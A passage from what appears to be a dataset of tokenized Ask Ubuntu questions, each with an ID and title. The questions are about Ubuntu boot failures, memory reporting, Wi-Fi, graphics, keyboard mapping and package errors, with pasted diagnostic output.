recovery a required device can not be accessed or is not plugged in . insert your installation media or contact your system administrator . i try hitting enter , screen goes black for a split second and re-appears , the same thing happens when i press f8 . is there any way to fix this without completely formatting the hard disk ? ( note : i followed a video by avoiderrors about dual-booting windows 8 and ubuntu 13.04 , but instead deleted the windows partition ( atleast i thought it was due to the amount of space used , all the other partitions were full , except the windows one , which was half-full . ) it was also obvious avoiderrors was using a virtual machine instead of actual hardware .
417014	ubuntu 12.0-4 high load at boot with process `` yes '' using more than 50 % slow boot and login time etc	i am using ubuntu 12.04 lts 64bit on a samsung chronos series 7 np700z5a-s0aus i had to redo the os , so i saved my home directory and just redid the operating system then i used synaptic and the `` read markings '' feature to restore my installed software from a previously saved list , i had had my root partition fill up and so used gparted to move the partitions around giving the root partition a bigger partition than 20gb , so i had to fix grub to make it boot . apon booting into my normal desktop i noticed that from power on , the computer goes through it 's text boot and then hangs for several seconds the continues to boot into my login screen , when i enter my password it once again takes several moments for the desktop to show , when i finally am logged in load is around 7.00_ and cpu usage is greater than 50 % . snooping around i found a process that was using 53 % of the cpu called `` yes '' i dropped to root using sudo su . and killed this process , after killing it , the cpu slowly began to drop from it 's 94c temp to a wonderfull 73c and my system seemed more responsive , i have always had high issues with ubuntu and this laptop running hot , but this is the first time that anything i have done to fix the issue has seemed to work , can anyone help me fix this ? i 'd really appriciate it . if you need any log output ill be happy to forwards them along . thank you for your time and help .
417016	i have two versions of java ?	i currently have the 3s and 64 bit versions of java . this is causing some errors , and i want to get rid of the 32 bit version . what do i do to get rid of it ?
417019	disk space error in ubuntu.installed along with windows 7	hello everyone i installed ubuntu 12.04 along with windows 7 before 15 days.my windows is installed in c drive of hard disk and ubuntu is installed in another file system.now when i am installing software in ubuntu then it saying the low space in disk ( file system ) .so what i do now ? its very urgent . please tell me the solution . thanks
417025	4gb out of 8gb total reserved 64bit 12.04 why	can anyone explain why 50 % of my ram is being reserved and for what ? i do have two radeon 7990 cards but surely the ram is not reserved for them ? root @ stan-desktop : /home/stan # cat /etc/issue ubuntu 12.04.3 lts \n \l root @ stan-desktop : /home/stan # uname -a linux stan-desktop 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:25:51 utc 2013 x86_64 x86_64 x86_64 gnu/linux root @ stan-desktop : /home/stan # cat /etc/issue^c root @ stan-desktop : /home/stan # cat /etc/issue ubuntu 12.04.3 lts \n \l root @ stan-desktop : /home/stan # free -m total used free shared buffers cached mem : 3912 1571 2341 0 81 625 -/+ buffers/cache : 863 3048 swap : 8148 0 8148 root @ stan-desktop : /home/stan # uname -a linux stan-desktop 3.8.0-35-generic # 50~precise1-ubuntu smp wed dec 4 17:25:51 utc 2013 x86_64 x86_64 x86_64 gnu/linux root @ stan-desktop : /home/stan # lshw -c memory *-firmware description : bios vendor : american megatrends inc. physical id : 0 version : p1.50 date : 10/12/2012 size : 64kib capacity : 4032kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb biosbootspecification *-cache:0 description : l1 cache physical id : 5 slot : l1-cache size : 192kib capacity : 192kib clock : 1ghz ( 1.0ns ) capabilities : pipeline-burst internal write-back unified *-cache:1 description : l2 cache physical id : 6 slot : l2-cache size : 4mib capacity : 4mib clock : 1ghz ( 1.0ns ) capabilities : pipeline-burst internal write-back unified *-cache:2 description : l3 cache physical id : 7 slot : l3-cache size : 4mib capacity : 4mib clock : 1ghz ( 1.0ns ) capabilities : pipeline-burst internal write-back unified *-memory description : system memory physical id : f slot : system board or motherboard size : 8gib *-bank:0 description : dimm ddr3 synchronous 667 mhz ( 1.5 ns ) product : psd34g133381 vendor : undefined physical id : 0 serial : 00000000 slot : a1_dimm0 size : 4gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:1 description : dimm synchronous [ empty ] product : array1_partnumber1 vendor : a1_manufacturer1 physical id : 1 serial : a1_sernum1 slot : a1_dimm1 *-bank:2 description : dimm ddr3 synchronous 667 mhz ( 1.5 ns ) product : psd34g133381 vendor : undefined physical id : 2 serial : 00000000 slot : a1_dimm2 size : 4gib width : 64 bits clock : 667mhz ( 1.5ns ) *-bank:3 description : dimm synchronous [ empty ] product : array1_partnumber3 vendor : a1_manufacturer3 physical id : 3 serial : a1_sernum3 slot : a1_dimm3 root @ stan-desktop : /home/stan # dmesg | grep e820 [ 0.000000 ] e820 : bios-provided physical ram map : [ 0.000000 ] bios-e820 : [ mem 0x0000000000000000-0x000000000009ffff ] usable [ 0.000000 ] bios-e820 : [ mem 0x0000000000100000-0x000000008e1e2fff ] usable [ 0.000000 ] bios-e820 : [ mem 0x000000008e1e3000-0x000000008e4f5fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x000000008e4f6000-0x000000008e8defff ] acpi nvs [ 0.000000 ] bios-e820 : [ mem 0x000000008e8df000-0x000000008ee31fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x000000008ee32000-0x000000008ee32fff ] usable [ 0.000000 ] bios-e820 : [ mem 0x000000008ee33000-0x000000008f038fff ] acpi nvs [ 0.000000 ] bios-e820 : [ mem 0x000000008f039000-0x000000008f452fff ] usable [ 0.000000 ] bios-e820 : [ mem 0x000000008f453000-0x000000008f7f3fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x000000008f7f4000-0x000000008f7fffff ] usable [ 0.000000 ] bios-e820 : [ mem 0x00000000fec00000-0x00000000fec00fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fec10000-0x00000000fec10fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fec20000-0x00000000fec20fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fed00000-0x00000000fed00fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fed61000-0x00000000fed70fff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fed80000-0x00000000fed8ffff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x00000000fef00000-0x00000000ffffffff ] reserved [ 0.000000 ] bios-e820 : [ mem 0x0000000100001000-0x000000016effffff ] usable [ 0.000000 ] e820 : update [ mem 0x00000000-0x0000ffff ] usable == > reserved [ 0.000000 ] e820 : remove [ mem 0x000a0000-0x000fffff ] usable [ 0.000000 ] e820 : last_pfn = 0x16f000 max_arch_pfn = 0x400000000 [ 0.000000 ] e820 : update [ mem 0x8f800000-0xffffffff ] usable == > reserved [ 0.000000 ] e820 : last_pfn = 0x8f800 max_arch_pfn = 0x400000000 [ 0.000000 ] e820 : [ mem 0x8f800000-0xfebfffff ] available for pci devices [ 0.347889 ] e820 : reserve ram buffer [ mem 0x8e1e3000-0x8fffffff ] [ 0.347891 ] e820 : reserve ram buffer [ mem 0x8ee33000-0x8fffffff ] [ 0.347892 ] e820 : reserve ram buffer [ mem 0x8f453000-0x8fffffff ] [ 0.347893 ] e820 : reserve ram buffer [ mem 0x8f800000-0x8fffffff ] [ 0.347895 ] e820 : reserve ram buffer [ mem 0x16f000000-0x16fffffff ] root @ stan-desktop : /home/stan # cat /proc/meminfo memtotal : 4006400 kb memfree : 2397856 kb buffers : 83668 kb cached : 640776 kb swapcached : 0 kb active : 594800 kb inactive : 477904 kb active ( anon ) : 349120 kb inactive ( anon ) : 232 kb active ( file ) : 245680 kb inactive ( file ) : 477672 kb unevictable : 0 kb mlocked : 0 kb swaptotal : 8344572 kb swapfree : 8344572 kb dirty : 0 kb writeback : 0 kb anonpages : 348256 kb mapped : 261108 kb shmem : 1096 kb slab : 96600 kb sreclaimable : 65196 kb sunreclaim : 31404 kb kernelstack : 3016 kb pagetables : 24424 kb nfs_unstable : 0 kb bounce : 0 kb writebacktmp : 0 kb commitlimit : 10347772 kb committed_as : 1839192 kb vmalloctotal : 34359738367 kb vmallocused : 387712 kb vmallocchunk : 34359347964 kb hardwarecorrupted : 0 kb anonhugepages : 0 kb hugepages_total : 0 hugepages_free : 0 hugepages_rsvd : 0 hugepages_surp : 0 hugepagesize : 2048 kb directmap4k : 362492 kb directmap2m : 3807232 kb directmap1g : 0 kb root @ stan-desktop : /home/stan #
417026	is there a good way to extract font and color info from a pdf ?	i 'm trying to recreate a couple of charts from the print edition of a publication from a pdf of it . the text is all text , so i 'm just looking for font names and a good way to get the colors out of the chart images .
417030	blinking cursor when trying to run live ubuntu 13.10 on usb	i have been trying to install ubuntu on this laptop forever . i have my usb drive all setup and ready to go , but when i try booting from my flash drive it just shows a blank screen with a blinking cursor . i ca n't even get to the screen where it asks you to either try or to install ubuntu . i have tested this usb with other computers and it works with them but not this one . it is a sony vaio vgn-fe550g ( pcg-7h1l ) and it uses an old phoenix bios . and no it is n't the phoenix awards bios , it is just the phoenix bios . if anyone can help me i would be very happy .
417036	how can i open my flightgear aircraft using ubuntu 12.04	i am an amateur when it come to the command line so i wonder if you can help me decipher the following error . i ca n't get one of my flightgear aircraft to work . the terminal output looks something like this : user @ chrubuntu : /usr/share/games/flightgear/aircraft $ fgfs -- aircraft=747-400 error reading aircraft : failed to open file at /usr/share/games/flightgear/aircraft/747-400/systems/aircraft/generic/flightrecorder/components/tanks.xml config option parsing failed ... any ideas ?
417046	screen goes blank when loading ubuntu 12.04 lts for the 1st time	i installed ubuntu 12.04 lts along win 7 ( win 7 in c : \ and ubuntu in d : ) . after i select ubuntu from win 7 boot loader , a screen which contains some lines that goes off within a second to the next screen where a cursor blinks . all i can notice from this flashing screen is `` ntfs '' and after this the screen just goes black . note : before installing ubuntu , i partitioned my c : \ into d : \ with ntfs file system and i 'm using alienware 14
417057	upgrade to 12.04 , now no ethernet , wireless keyboard mouse screen black with black icons	i just did the suggested upgrade from 11.04 to 12.04 and after reboot , i can use my wireless keyboard to maneuver the gnu grub to select which to boot into , but when i select ubuntu , it goes to the login screen and my wireless keyboard and mouse do not work . i plugged in a ps2 keyboard , logged in but when it loads , the screen is black , it shows icons on the side which are also black , i can press the windows key and it pops up the search window , i tried to open firefox to browse , but i have no internet connection , i am connected to my network with an ethernet cord . as a note , i would like to upgrade to the newest most logical version . i believe my graphics card is an ati radeon hd5450 . using an amd fx-4100 quad core processor with 8 gb ram
417061	problem loading windows over ubuntu - not reading boot usb on reboot	i 'm new to ubuntu , i had been wanting to try it for a while . my hard drive on my hp envy m6 crashed , so i had to get a new one outside of warranty . i did n't want to pay for windows discs , so i decided to go with the free ubuntu . i 've had nothing but problems due to incompatibility with the hp components.. wifi works at 10 % normal . after many frustrations with wine not working at all , and not being code savvy , i 've decided to rid myself of ubunut . i 've got a working usb boot drive with win7 on it . when i reboot my machine with usb drive at the top of the boot options in bios , screen flashes once then goes blank with no hard drive activity . i am still able to run ubuntu , as well as boot from the ubuntu usb i created . yet nothing from the win7 stick . the hard drive was brand new , and i was only able to load ubuntu with a flash drive of less than 2gb due to no drivers being loaded on hd yet . why am i unable to boot from the win7 ntfs stick ? any help would be appreciated .
417064	how to install ubutun 12.04 on windows 8 through vmware player	i bought a new laptop that came with windows 8 64 bit , built in . i have tried to install ubuntu 12.04 through vmware but it did n't work . it get 's stuck during the installation prosses and the installation never finishes . but i ever seen this installation issues on windows 7 , please assist me to install ubuntu 12.04 on my windows 8 machine through vmware player .
417065	drive damaged during vmware copy	i was copying data from two ext2 formatted drives using an ubuntu 11.04 virtual machine in vmware fusion 4 on a macmini with snow leopard . i meant to quit from something else , but accidentally quit fusion mid copy . now the two drives will not mount . `` unable to mount '' `` error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sdc2 , missing codepage or helper program or other error . in some cases useful info is found in syslog - t try dmesg | tail or so '' all dmesg produces is : '' write protect is off mode sense : 00 38 00 00 asking for cache data failed assuming drive cache : write through asking for cache data failed assuming drive cache : write through sdc : sdc1 sdc2 asking for cache data failed assuming drive cache write through attached scsi disk '' i need the data on this disk , please help ! !
417066	how add shortcut of printer setting on desktop panel on ubuntu 13.10 ?	i 'm using ubuntu 13.10 gnome desktop , i 'm looking for a way to add `` printers '' shortcut on desktop panel , i need to change printer settings always . how can i do this ?
417071	problems with keyboard layout change . local issue or bug ?	in the past week and a half there have been many ubuntu base upgrades , and i did not restart each time after an upgrade . now that i have restarted the changing between languages via the shortcut ( alt+l shift ) no longer works ( i am forced to change it in the panel with the mouseâś very uncomfortable ) . i have already attempted to change the shortcut to a different combination , and then changed it back . it still does not work . restarting several times ( as if it were windows ) does n't work either . everything worked perfectly before . the question is : is there anybody else who experiences this problem or is this a local issue that can be resolved with the configuration change ? if it is a bug , what package it is a bug with ( so that i can report it ) ?
417072	downgrade ubuntu 12.10 to 12.04	is there a way to downgrade ubuntu 12.10 to 12.04 without any installation cds and without losing any data . sorry for the caps , some people miss the improtant part . also i know an alternate cd would work but they do n't make them for newer ubuntu releases so if i need to do this with 14.10-14.04 i 'll be prepared .
417076	what do i need to do to preserve sda2 and sda4 paritions , and format sda3 for ubuntu and part of it as swap area ?	been figuring out how to replace my windows 8 with ubuntu 12.04 lts for three hours now , and i need help . i have reached the point where i need to select a partition where to install ubuntu . i have 4 partitions in my pc : sda1 100mb . allocated for the system . prev made by windows sda2 20000mb sda3 52000mb sda4 40000mb i want to install ubuntu in sda3 partition to replace windows 8 . i do n't want sda2 and sda4 partitions to be formatted as i have important files saved on those partitions . what i did is i edited sda3 partition to be the ext4 `` / '' . i was planning to make 4000mb of it to be `` swap area '' but i ca n't as the remaining 4000mb is marked with 'unusable ' after editing the sda3 partition . what 's going on here and what do i need to do to preserve sda2 and sda4 paritions , and format sda3 for ubuntu and part of it as swap area ?
417077	accidentally extracted ubuntu iso on hard drive and made hard drive bootable	i used unetbootin to create a bootable usb of ubuntu on my flash drive . i accidentally selected to extract the ubuntu iso to my hard drive . unetbootin asked if it should replace all the files , then i clicked yes . all my files are there in home folder , all my software is there in /usr . when i boot up my hard drive it asks me to install ubuntu .
417086	login to squiggly lines on display ubuntu 12.04	when i booted up my machine today everything looked good until it got to the ubuntu screen , and that is when the squiggly lines started . the screen looks fine when showing everything else . i have n't installed anything aside from any new updates and i did not change anything . do you have any ideas ?
417087	vms keep disappearing from vmplayer on reboot	my vms in both /home and other places keep disappearing after reboot . i 'm running vmplayer 6.0.1 and ubuntu 12.04 . ive tried removing .vmware under /home but the problem persists . saad @ beast : ~ $ ls -l /home/saad/.vmware total 12 -rw-rw-r -- 1 saad saad 426 feb 6 10:23 player.log -rw-rw-r -- 1 saad saad 1114 feb 6 10:13 playeruploadeddata.log -rw -- -- -- - 1 saad saad 301 feb 6 10:23 preferences
417088	connected to wifi but unable to access the internet	as the title says , i can connect to wifi network , but however , i can not access any of the website over internet . i have just installed a fresh ubuntu distribution on to my macbook pro so i am new to linux . i am also not sure what other info to provide . so please advise me in this regard & what type of information needed to help me solve this issue . i am currently on ubuntu 13.10 . output of ifconfig : eth0 link encap : ethernet hwaddr 10:9a : dd:4d:4d : f0 up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1296 errors:0 dropped:0 overruns:0 frame:0 tx packets:1296 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:98244 ( 98.2 kb ) tx bytes:98244 ( 98.2 kb ) wlan0 link encap : ethernet hwaddr c8 : bc : c8 : ef : e4:0d inet addr:192.168.0.192 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :cabc : c8ff : feef : e40d/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:2895 errors:0 dropped:0 overruns:0 frame:0 tx packets:2513 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:820807 ( 820.8 kb ) tx bytes:321270 ( 321.2 kb ) output of iwconfig : eth0 no wireless extensions . lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' kpke4 home network '' mode : managed frequency:2.462 ghz access point : 00:22 : b0 : b0:98:3b bit rate=130 mb/s tx-power=19 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=55/70 signal level=-55 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:0 invalid misc:11 missed beacon:0 output for ping -c5 8.8.8.8 ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . 64 bytes from 8.8.8.8 : icmp_seq=1 ttl=47 time=35.2 ms 64 bytes from 8.8.8.8 : icmp_seq=2 ttl=47 time=36.8 ms 64 bytes from 8.8.8.8 : icmp_seq=3 ttl=47 time=50.3 ms 64 bytes from 8.8.8.8 : icmp_seq=4 ttl=47 time=35.9 ms 64 bytes from 8.8.8.8 : icmp_seq=5 ttl=47 time=35.4 ms -- - 8.8.8.8 ping statistics -- - 5 packets transmitted , 5 received , 0 % packet loss , time 4005ms rtt min/avg/max/mdev = 35.257/38.778/50.372/5.827 ms output of route -n destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.0.1 0.0.0.0 ug 0 0 0 wlan0 192.168.0.0 0.0.0.0 255.255.255.0 u 9 0 0 wlan0
417092	motion computing m1400 - wacom touchscreen not recognized	got myself a motion computing ( basically gateway ) m1400 tablet pc a year ago , and it 's been a running project for a while now . i 've been struggling with this machine since day one , but after a lot of head banging , i got a clean install of xubuntu 12.04 . the only remaining problem is that ubuntu does not seem to recognize the wacom digitizer screen . collin @ molly : ~ $ lspci 00:00.0 host bridge : intel corporation 82852/82855 gm/gme/pm/gmv processor to i/o controller ( rev 02 ) 00:00.1 system peripheral : intel corporation 82852/82855 gm/gme/pm/gmv processor to i/o controller ( rev 02 ) 00:00.3 system peripheral : intel corporation 82852/82855 gm/gme/pm/gmv processor to i/o controller ( rev 02 ) 00:02.0 vga compatible controller : intel corporation 82852/855gm integrated graphics device ( rev 02 ) 00:02.1 display controller : intel corporation 82852/855gm integrated graphics device ( rev 02 ) 00:1d.0 usb controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 1 ( rev 03 ) 00:1d.1 usb controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 2 ( rev 03 ) 00:1d.2 usb controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) usb uhci controller # 3 ( rev 03 ) 00:1d.7 usb controller : intel corporation 82801db/dbm ( ich4/ich4-m ) usb2 ehci controller ( rev 03 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev 83 ) 00:1f.0 isa bridge : intel corporation 82801dbm ( ich4-m ) lpc interface bridge ( rev 03 ) 00:1f.1 ide interface : intel corporation 82801dbm ( ich4-m ) ide controller ( rev 03 ) 00:1f.3 smbus : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) smbus controller ( rev 03 ) 00:1f.5 multimedia audio controller : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 audio controller ( rev 03 ) 00:1f.6 modem : intel corporation 82801db/dbl/dbm ( ich4/ich4-l/ich4-m ) ac'97 modem controller ( rev 03 ) 02:00.0 firewire ( ieee 1394 ) : texas instruments tsb43ab22a ieee-1394a-2000 controller ( phy/link ) [ iohci-lynx ] 02:01.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 ) 02:02.0 network controller : intel corporation pro/wireless 2200bg [ calexico2 ] network connection ( rev 05 ) 02:04.0 cardbus bridge : ene technology inc cb1410 cardbus controller ( rev 01 ) so after some googling , i figured my problem was i needed to install the linux wacom driver . ultimately , i discovered that these drivers are now included in 12.04 , but regardless , i tried to compile them and got the following after running ./configure : no package 'xorg-server ' found no package 'xproto ' found no package 'xext ' found no package 'kbproto ' found no package 'inputproto ' found no package 'randrproto ' found consider adjusting the pkg_config_path environment variable if you installed software in a non-standard prefix . alternatively , you may set the environment variables xorg_cflags and xorg_libs to avoid the need to call pkg-config . see the pkg-config man page for more details . so i am again stumped . i did n't think this would be a problem , as the digitzer worked out of the box in a previous 10.04 install , but i 've spent hours trying to find a solution this time around . any help would be greatly appreciated .
417093	application finder for mate and gnome session fallback ?	mate and gnome session fallback desktop environments are almost alike and really lightweight and it is the most preferred desktop environment for me . only thing i miss is some way to search installed applications quickly as we do using unity-dash . since going through the application menu and looking for the long list of installed application takes a long time . some time it is so difficult to find an application . for example looking for pcmanfm file manager , you guys know what i 'm talking about . : ) is there any application finder which can be installed in mate and/or gnome session fallback to search installed application quickly ?
417094	socket communiction in absence of wired network connection	i am facing a strange issue on my ubuntu ( 12.04.3 64 bit ) . i have a couple of c programs communicating ( let 's call them sender and receiver programs ) through sockets . these work as expected when the machine ( a dell laptop in this case ) is connected to lan . but when i isolate the laptop from the lan ( which means the wired connection is disconnected as shown in network manager ) , i can no longer send/receive using sockets . probably the communication goes through the network card which is not powered ( my guess ) in this case . please suggest how to resolve it . thanks in advance .
417095	how to benchmark speed of data transfer through sockets ?	i am trying to send data between a virtual machine and its host using tcp socket and virtio-serial . i would like to benchmark these two methods . are there any tools available to benchmark this ? if not , what is the most efficient and accurate way for this ?
417096	zune on ubuntu 12.04	how i can synchronize my windows phone on ubuntu 12.04 ? i ca n't find a functional alternative . ( does n't work : virtual box , wine )
417097	apt-get update command results in 404 not found error	please help with this error . sudo apt-get update w : failed to fetch http : //ppa.launchpad.net/upubuntu-com/office/ubuntu/dists/saucy/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead .
417104	why is primusrun slower than optirun	i 'm having a similar issue to this question , only primusrun is still slower even with vblank synchronization disabled . edit : i did n't run standard glxspheres without turning off vblank sychronization . when i do i get $ vblank_mode=0 glxspheres64 polygons in scene : 62464 attention : default value of option vblank_mode overridden by environment . attention : default value of option vblank_mode overridden by environment . visual id of window : 0x20 context is direct opengl renderer : mesa dri intel ( r ) haswell mobile 139.729257 frames/sec - 155.937850 mpixels/sec 201.142942 frames/sec - 224.475523 mpixels/sec $ glxspheres64 polygons in scene : 62464 visual id of window : 0x20 context is direct opengl renderer : mesa dri intel ( r ) haswell mobile 60.409773 frames/sec - 67.417306 mpixels/sec $ optirun glxspheres64 polygons in scene : 62464 visual id of window : 0x20 context is direct opengl renderer : geforce gt 750m/pcie/sse2 276.092868 frames/sec - 308.119641 mpixels/sec erik @ yorda : ~ $ vblank_mode=0 primusrun glxspheres64 attention : default value of option vblank_mode overridden by environment . attention : default value of option vblank_mode overridden by environment . polygons in scene : 62464 attention : default value of option vblank_mode overridden by environment . attention : default value of option vblank_mode overridden by environment . visual id of window : 0x20 context is direct opengl renderer : geforce gt 750m/pcie/sse2 attention : default value of option vblank_mode overridden by environment . attention : default value of option vblank_mode overridden by environment . 198.399436 frames/sec - 221.413770 mpixels/sec i 'm not sure why primus would be running slower . i 'm using ubuntu 13.10 with the experimental 310 drivers . edit : it seems that primusrun is giving no performance boost over the onboard intel graphics .
417105	implement https access for phpmyadmin in ubuntu webserver	this is n't directly ubuntu question but more of an apache2 question . my ubuntu webserver was recently scanned by a web application inspection program where it checks for any vulnerability in my server . the result i received was mostly medium-level vulnerabilities and management wanted me to quickly resolve the issue . one of the issues is to use basic authentication over an https connection for this directory /phpmyadmin/setup heading over to that link https : // < ip > /phpmyadmin/setup , will prompt a javascript login page where it requires a username/password . i didnt actually knew that there 's such directory , mainly because i just install lamp and leave , with very minimal configuration . now i 'm trying to understand how can i use https to access that link , any ideas on how i can properly execute this ?
417108	connecting ubuntu to internet using windows 8 as bridge ?	i have a dell inspiron 660s running windows 8.1 , and i just did a full boot of ubuntu 13.10 onto a dell optiplex 330 that was previously running windows xp . my goal is to connect to the internet by using the 660s as a bridge to the internet by connecting the two computers with an ethernet cable . the level of difficulty : my internet requires you to log into it on a separate browser log in page similar to those in airports and other public wi-fi access points except that it requires a username and password to log in . my theory is that if i first log in to the internet on my windows machine then i can connect to it by simply opening a connection from the ubuntu os to the windows os . am i off track here or am i on the right track ? anyone know how to do this ?
417111	open firefox from bash file `` error : no display specified ''	i need to open a browser and access my server with the ip address 1.2.3.4 . first i ping my server and if the ping did not fail i launch the home page in a browser . for this i have written a bash file as follows : # add ip / hostname separated by white space myhost=1.2.3.4 # no ping request count=1 count= $ ( ping -c $ count $ myhost | grep 'received ' | awk -f ' , ' ' { print $ 2 } ' | awk ' { print $ 1 } ' ) if [ $ count -eq 0 ] ; then # 100 % failed echo `` host : $ myhost is down ( ping failed ) at $ ( date ) '' else firefox $ myhost fi but i am getting an error message `` error : no display specified '' . firefox is not launching . what am i doing wrong . this file is getting called every 5 minutes using a cronjob . the cronjob seems to be working fine . any help is appreciated . thanks , pre
417113	error after installing packages - sub-process /usr/bin/dpkg returned an error code ( 1 )	please help with this error errors were encountered while processing : gdk-pixbuf-psd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) and-dev @ ubuntu01 : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 4 not upgraded . 1 not fully installed or removed . after this operation , 0 b of additional disk space will be used . setting up gdk-pixbuf-psd ( 20081217 ) ... /var/lib/dpkg/info/gdk-pixbuf-psd.postinst : 23 : /var/lib/dpkg/info/gdk-pixbuf-psd.postinst : can not create /usr/lib/gtk-2.0/2.10.0/loader-files.d/gdk-pixbuf-psd.loaders : directory nonexistent /var/lib/dpkg/info/gdk-pixbuf-psd.postinst : 23 : /var/lib/dpkg/info/gdk-pixbuf-psd.postinst : gdk-pixbuf-query-loaders : not found dpkg : error processing gdk-pixbuf-psd ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : gdk-pixbuf-psd e : sub-process /usr/bin/dpkg returned an error code ( 1 ) result of :
417116	black screen after installing `` mesa '' library	i 'm using ubuntu-12.04 . i haved installed mesa library using the apt-get command : sudo apt-get install libglapi-mesa & & sudo apt-get install libosmesa6 and ubuntu does n't boot after installing the mesa library . then i reboot ubuntu but it only shows black screen . i did n't modify anything at ubuntu , only installed the mesa graphic library . help me please .
417117	installing windows programs and lexmark x4650 printer	i am using ubuntu 12.04 . what software do i need to so i can install windows programs from cd or flash drive ? is this software in the ubuntu software center or do i download it from a website ? at one point i saw a program called wine for running windows applications in ubuntu ? currently the cd/dvd drive is n't recognized . also how can i install and use my lexmark all-in-one printer ? the lexmark website does n't list ubuntu 12.04 for downloadable drivers . i hope my windows programs are not all garbage because i have ubuntu and windows 7 has been deleted .
417118	disk failure is imminent after partion with gparted	i was trying to partition my drive . i used gparted live iso using usb drive . it partitioned successfully but when i logged in ubuntu again it is showing some problem in my hard drive . error is disk failure is imminent . how to resolve it ? is there any fix or i have to change my hard drive ? ?
417119	ctrl , alt and super keys are all mapped as left shift key on azio keyboard	i bought a keyboard yesterday , azio l40 ( model : abg600f ) . everything works fine in windows , but when i boot into ubuntu , both of my ctrl keys , alt keys , and super keys are recognized as left shift key . even my right shift key is recognized as left shift key . i have tried xev , and confirmed that ubuntu indeed recognized them all as left shift . i tried those remapping strategy using xmodmap , but since my os thinks they are all left shift i ca n't remap them . my os is ubuntu 13.10 , and here is the result of lspci : host bridge : intel corporation 2nd generation core processor family dram controller pci bridge : intel corporation xeon e3-1200/2nd generation core processor family pci express root port communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller # 2 audio device : intel corporation 6 series/c200 series chipset family high definition audio controller pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 1 pci bridge : intel corporation 6 series/c200 series chipset family pci express root port 4 usb controller : intel corporation 6 series/c200 series chipset family usb enhanced host controller isa bridge : intel corporation h67 express chipset family lpc controller ( rev 05 ) 00:1f.2 sata controller : intel corporation 6 series/c200 series chipset family sata ahci controller smbus : intel corporation 6 series/c200 series chipset family smbus controller vga compatible controller : advanced micro devices , inc. [ amd/ati ] tahiti pro [ radeon hd 7950 ] audio device : advanced micro devices , inc. [ amd/ati ] tahiti xt hdmi audio [ radeon hd 7970 series ] network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ethernet controller : broadcom corporation netlink bcm57788 gigabit ethernet pcie and here is the output of lsusb : alcor micro corp . flash card reader/writer microsoft corp. nano transceiver v1.0 for bluetooth intel corp . integrated rate matching hub linux foundation 2.0 root hub microdia logitech , inc. g400 optical mouse intel corp . integrated rate matching hub linux foundation 2.0 root hub strangely , my keyboard is connected via usb , but it is not shown here . is there anything i can do ? if nothing works , i 'll have to return the keyboard , since i ca n't live without ctrl+c , ctrl+v , and ctrl+m . thank you for all your help in advance .
417121	wireless networks never show up , after trying almost everything	i got a new laptop and i installed ubuntu 13.04 , and then i noticed wifi is n't working . i installed ubuntu 12.10 and now i 'm still at 12.10 with no wifi . i have this wireless usb card ( i 'm connected using it now ) . whenever i plugged in things work normally and wireless networks show up . yes , of course i have broadcom and i removed the existing sta installation , installed b43-firmware with the legacy one ( just in case ) , i removed , reinstalled bcmwl-kernel-source , i did set managed=true in networkmanager.config , i did update before installing b43-firmware , i almost did every single thing in other threads . i 'm giving up , i hope this works or else i 'll need to switch back on windows.. ! please help me : ( since i 've noticed you keep asking for codes to check some things , i 'm going to post the output of running : sudo lshw -c network sudo lshw -c network ci ( sysfs ) *-network description : ethernet interface product : 82579lm gigabit network connection vendor : intel corporation physical id : 19 bus info : pci @ 0000:00:19.0 logical name : eth0 version : 04 serial : d4 : c9 : ef:50 : df:9c width : 32 bits clock : 33mhz capabilities : pm msi cap_list ethernet physical configuration : broadcast=yes driver=e1000e latency=0 multicast=yes resources : irq:17 memory : d4400000-d441ffff memory : d443a000-d443afff ioport:5020 ( size=32 ) *-network 